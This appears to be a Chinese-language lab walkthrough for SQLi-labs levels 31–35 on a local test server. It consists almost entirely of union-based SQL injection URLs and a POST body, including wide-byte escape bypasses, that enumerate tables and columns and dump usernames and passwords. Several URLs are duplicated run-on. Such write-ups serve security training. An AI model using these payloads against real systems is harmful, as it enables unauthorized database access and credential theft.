第三十一关
一.判断闭合
1“”
二.查询数据库
http://127.0.0.1/Less-31/?id=-1%22)%20union%20select%201,2,database()--+http://127.0.0.1/Less-31/?id=-1%22)%20union%20select%201,2,database()--+
三.查表
http://127.0.0.1/Less-31/?id=-1%22)%20union%20select%201,2,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27)--+http://127.0.0.1/Less-31/?id=-1%22)%20union%20select%201,2,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27)--+
四.查列
http://127.0.0.1/Less-31/?id=-1%22)%20union%20select%201,2,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27)--+http://127.0.0.1/Less-31/?id=-1%22)%20union%20select%201,2,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27)--+
五.查询users表中所有数据
第三十二关
一.判断闭合点
1’
二.查询数据库
http://127.0.0.1/Less-32/?id=-1%aa%5c%27%20union%20select%201,2,database()%20--+http://127.0.0.1/Less-32/?id=-1%AA%5C%27%20union%20select%201,2,database()%20--+
三.查表
http://127.0.0.1/Less-32/?id=-1%aa%5c%27%20union%20select%201,2,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database())%20--+http://127.0.0.1/Less-32/?id=-1%AA%5C%27%20union%20select%201,2,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database())%20--+
四.查列
http://127.0.0.1/Less-32/?id=-1%aa%5c%27%20union%20select%201,2,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=(select%20right(group_concat(table_name),5)%20from%20information_schema.columns%20where%20table_schema=database()))--+http://127.0.0.1/Less-32/?id=-1%AA%5C%27%20union%20select%201,2,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=(select%20right(group_concat(table_name),5)%20from%20information_schema.columns%20where%20table_schema=database()))--+
五.查user表中所有数据
http://127.0.0.1/Less-32/?id=-1%aa%5c%27%20union%20select%201,2,group_concat(username,0,password)%20from%20users--+http://127.0.0.1/Less-32/?id=-1%AA%5C%27%20union%20select%201,2,group_concat(username,0,password)%20from%20users--+
三十三关
一判断闭合方式
1’
二.查询数据库
http://127.0.0.1/Less-33/?id=-1%aa%5c%27%20union%20select%201,2,database()--+http://127.0.0.1/Less-33/?id=-1%AA%5C%27%20union%20select%201,2,database()--+
三.查表
http://127.0.0.1/Less-33/?id=-1%aa%5c%27%20union%20select%201,2,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database())--+http://127.0.0.1/Less-33/?id=-1%AA%5C%27%20union%20select%201,2,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database())--+
四.查列
http://127.0.0.1/Less-33/?id=-1%aa%5c%27%20union%20select%201,2,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=(select%20right(group_concat(table_name),5)%20from%20information_schema.tables%20where%20table_schema=database()))--+http://127.0.0.1/Less-33/?id=-1%AA%5C%27%20union%20select%201,2,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=(select%20right(group_concat(table_name),5)%20from%20information_schema.tables%20where%20table_schema=database()))--+
五.查user表里所有数据
http://127.0.0.1/Less-33/?id=-1%aa%5c%27%20union%20select%201,2,(select%20group_concat(username,0,password)%20from%20security.users)--+http://127.0.0.1/Less-33/?id=-1%AA%5C%27%20union%20select%201,2,(select%20group_concat(username,0,password)%20from%20security.users)--+
第三十四关
一.利用burp进行抓包
二.查询数据库
uname=-1%df' union select 1,2#&passwd=1&submit=Submit
三.查表
uname=-1%df' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#&passwd=1&submit=Submit
四.查列
uname=-1%df' union select 1,group_concat(column_name) from information_schema.columns where table_name=0x656D61696C73#&passwd=1&submit=Submit
五.查user表中所有数据
uname=-1%df' union select 1,group_concat(id,0x3a,email_id) from emails#&passwd=1&submit=Submit
第三十五关
一.查询数据库
http://127.0.0.1/Less-35/?id=-1%20union%20select%201,2,database()--+http://127.0.0.1/Less-35/?id=-1%20union%20select%201,2,database()--+
二. 查表
http://127.0.0.1/Less-35/?id=-1%20union%20select%201,2,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database())--+http://127.0.0.1/Less-35/?id=-1%20union%20select%201,2,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database())--+
三.查列
http://127.0.0.1/Less-35/?id=-1%20union%20select%201,2,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=(select%20right(group_concat(table_name),5)%20from%20information_schema.tables%20where%20table_schema=database()))--+http://127.0.0.1/Less-35/?id=-1%20union%20select%201,2,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=(select%20right(group_concat(table_name),5)%20from%20information_schema.tables%20where%20table_schema=database()))--+
四.查user表里所有数据
http://127.0.0.1/Less-35/?id=-1%20union%20select%201,2,(select%20group_concat(username,0,password)%20from%20security.users)--+http://127.0.0.1/Less-35/?id=-1%20union%20select%201,2,(select%20group_concat(username,0,password)%20from%20security.users)--+